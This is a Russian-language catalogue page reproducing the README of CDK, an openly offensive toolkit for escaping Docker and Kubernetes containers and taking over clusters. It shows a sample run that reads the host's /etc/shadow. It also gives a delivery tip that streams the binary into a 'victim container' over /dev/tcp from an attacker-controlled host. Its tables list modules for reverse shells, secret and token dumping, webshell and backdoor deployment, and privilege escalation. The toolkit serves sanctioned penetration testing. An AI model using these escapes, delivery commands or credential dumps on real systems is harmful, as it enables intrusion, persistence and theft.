Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CDK — 📦 Сделайте тестирование безопасности K8s, Docker и Containerd проще. | Kitploit
Инструменты/GitHubGitHub/cdk-team/cdk
Повышение привилегийРазведкаБезопасность контейнеровМеханизмы персистентностиЭксплуатацияЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеБезопасность облачных средПобег из Контейнера
GitHubcdk-team/cdk
4.7k6063 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CDK

📦 Сделайте тестирование безопасности K8s, Docker и Containerd проще.

РепозиторийСайт

CDK - Набор инструментов для проникновения в контейнеры без зависимостей

Английский | 简体中文

png

Правовое уведомление

Использование CDK для атак на цели без предварительного взаимного согласия незаконно. CDK предназначен только для целей тестирования безопасности.

Обзор

CDK — это набор инструментов с открытым исходным кодом для проникновения в контейнеры, предназначенный для обеспечения стабильной эксплуатации в различных облегченных контейнерах без каких-либо зависимостей от ОС. Он включает полезные сетевые инструменты и множество мощных PoC/EXP, а также помогает легко выйти из контейнера и захватить кластер K8s.

Быстрый старт

Запустите cdk eva для получения оценочной информации и рекомендуемого эксплойта, затем выполните cdk run для начала атаки.

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Установка/Доставка

Загрузите последний релиз по адресу https://github.com/cdk-team/CDK/releases/

Поместите исполняемые файлы в целевой контейнер и начните тестирование.

СОВЕТЫ: Доставка CDK в целевой контейнер при реальном тестировании на проникновение

Если у вас есть эксплойт, который может загрузить файл, вы можете загрузить бинарный файл CDK напрямую.

Если у вас есть эксплойт RCE, но в целевом контейнере нет curl или wget, вы можете использовать следующий метод для доставки CDK:

  1. Сначала разместите бинарный файл CDK на вашем хосте с публичным IP.
root@kitploit:~
(on your host)
nc -lvp 999 < cdk
  1. Внутри контейнера жертвы выполните
root@kitploit:~
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Использование

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Возможности

CDK имеет три модуля:

  1. Evaluate (Оценка): сбор информации внутри контейнера для выявления потенциальных уязвимостей.
  2. Exploit (Эксплуатация): для выхода из контейнера, закрепления и бокового перемещения.
  3. Tool (Инструменты): сетевые инструменты и API для TCP/HTTP запросов, туннелей и управления кластером K8s.

Модуль Evaluate

Usage

root@kitploit:~
cdk evaluate [--full]

Модуль Exploit

List all available exploits:

root@kitploit:~
cdk run --list

Run targeted exploit:

root@kitploit:~
cdk run <script-name> [options]

Примечание о Thin: Thin-релиз подготовлен для кратковременных оболочек контейнеров, таких как бессерверные функции. Мы добавляем теги сборки в исходный код и удаляем несколько эксплойтов, чтобы сделать бинарник легче. Файл размером 2 МБ содержит 90% функций CDK, также вы можете выбрать полезные эксплойты из исходного кода CDK, чтобы собрать свой собственный легковесный бинарник.

Модуль Tool

Запуск команд аналогичен Linux, с небольшими отличиями в аргументах ввода, см. ссылку на использование.

root@kitploit:~
cdk nc [options]
cdk ps

Документация о релизах

Если вы хотите узнать, как мы выпускаем новую версию, как создается thin-релиз, почему мы предоставляем upx-версии, в чем различия между разными версиями (all, normal, thin, upx) и как выбрать конкретные эксплойты и инструменты CDK для компиляции собственного релиза, обратитесь к Документации о релизах.

Документация для разработчиков

  • Запуск теста в контейнере.

Вклад в CDK

Прежде всего, спасибо, что нашли время внести вклад!

Спасибо следующим участникам:

Больше участников: Список участников

Сообщение об ошибках

Ошибки отслеживаются в GitHub Issues. Создайте issue с текущей версией CDK, сообщением об ошибке и окружением. Опишите точные шаги для воспроизведения проблемы.

Предложение улучшений

Предложения по улучшению отслеживаются в GitHub Discussions. Вы можете публиковать любые мысли здесь для прямого обсуждения с разработчиками.

Pull Requests

Исправление проблем или поддержание качества CDK:

  • Опишите текущую версию CDK, окружение, проблему и точные шаги для её воспроизведения.
  • Приложите скриншоты или логи до и после исправления проблемы.

Новая функция или эксплойт:

  • Объясните, почему это улучшение будет полезно другим пользователям.
  • Пожалуйста, обеспечьте устойчивую среду для проверки вкладов.
  • Скриншоты, демонстрирующие работу новой функции.
  • Если вы добавляете новые скрипты evaluate/exploit, добавьте простую документацию в сообщение PR, вот пример.

События

404StarLink 2.0 - Galaxy

png

Проект CDK теперь включен в Starlink Project 2.0 от 404Team. Присоединяйтесь к сообществу StarLink, чтобы связаться с командой разработчиков CDK.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
Скачать инструмент
ТактикаСкриптПоддерживаетсяИспользование/Пример
Сбор информацииБазовая информация об ОС✔ссылка
Сбор информацииДоступные возможности✔ссылка
Сбор информацииДоступные команды Linux✔ссылка
Сбор информацииТочки монтирования✔ссылка
Сбор информацииСетевой namespace✔ссылка
Сбор информацииЧувствительные ENV✔ссылка
Сбор информацииЧувствительные процессы✔ссылка
Сбор информацииЧувствительные локальные файлы✔ссылка
Сбор информацииKube-proxy Route Localnet(CVE-2020-8558)✔ссылка
Сбор информацииDNS-обнаружение служб✔ссылка
ОбнаружениеИнформация об API-сервере K8s✔ссылка
ОбнаружениеИнформация о сервис-аккаунте K8s✔ссылка
ОбнаружениеAPI метаданных облачного провайдера✔ссылка
ТактикаТехникаИмя эксплойта CDKПоддерживаетсяВ ThinДокументация
Выход из контейнераdocker-runc CVE-2019-5736runc-pwn✔✔
Выход из контейнераcontainerd-shim CVE-2020-15257shim-pwn✔ссылка
Выход из контейнераdocker.sock PoC (атака DIND)docker-sock-check✔✔ссылка
Выход из контейнераdocker.sock RCEdocker-sock-pwn✔✔ссылка
Выход из контейнераDocker API(2375) RCEdocker-api-pwn✔✔ссылка
Выход из контейнераВыход через монтирование устройствmount-disk✔✔ссылка
Выход из контейнераВыход через LXCFSlxcfs-rw✔✔ссылка
Выход из контейнераВыход через cgroupsmount-cgroup✔✔ссылка
Выход из контейнераЗлоупотребление непривилегированным пользовательским namespace (CVE-2022-0492)abuse-unpriv-userns✔✔ссылка
Выход из контейнераВыход через procfsmount-procfs✔✔ссылка
Выход из контейнераPtrace выход PoCcheck-ptrace✔✔ссылка
Выход из контейнераПерезапись cgroup (devices.allow)rewrite-cgroup-devices✔✔ссылка
Выход из контейнераЧтение произвольного файла из хост-системы (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔ссылка
ОбнаружениеЗондирование компонентов K8sservice-probe✔✔ссылка
ОбнаружениеДамп метаданных sidecar Istioistio-check✔✔ссылка
ОбнаружениеДамп политик безопасности подов K8sk8s-psp-dump✔ссылка
Удаленное управлениеОбратная оболочкаreverse-shell✔✔ссылка
Удаленное управлениеKubelet Execkubelet-exec✔✔
Доступ к учетным даннымБрутфорс реестраregistry-brute✔✔ссылка
Доступ к учетным даннымСканирование ключей доступаak-leakage✔✔ссылка
Доступ к учетным даннымПолучение токена K8s через etcdetcd-get-k8s-token✔✔
Доступ к учетным даннымДамп секретов K8sk8s-secret-dump✔✔ссылка
Доступ к учетным даннымДамп конфигурации K8sk8s-configmap-dump✔✔ссылка
Повышение привилегийОбход RBAC K8sk8s-get-sa-token✔✔ссылка
Повышение привилегийCVE-2026-31431 copy-fail (non-root→root, только x86_64)copy-fail-cve-2026-31431✔ссылка
ЗакреплениеРазвертывание веб-шеллаwebshell-deploy✔✔ссылка
ЗакреплениеРазвертывание под-бэкдораk8s-backdoor-daemonset✔✔ссылка
ЗакреплениеРазвертывание теневого API-сервера K8sk8s-shadow-apiserver✔ссылка
ЗакреплениеMITM-атака на K8s (CVE-2020-8554)k8s-mitm-clusterip✔✔ссылка
ЗакреплениеРазвертывание CronJob в K8sk8s-cronjob✔✔ссылка
КомандаОписаниеПоддерживаетсяИспользование/Пример
ncTCP-туннель✔ссылка
psИнформация о процессах✔ссылка
netstatКак команда "netstat -antup"✔
ifconfigСетевая информация✔ссылка
viРедактирование файлов✔ссылка
ectlНеавторизованный перебор ключей etcd✔
kcurlЗапрос к API-серверу K8s✔ссылка
dcurlЗапрос к HTTP API Docker✔ссылка
ucurlЗапрос к Unix-сокету Docker✔ссылка
rcurlЗапрос к API реестра Docker
probeСканирование IP/портов✔ссылка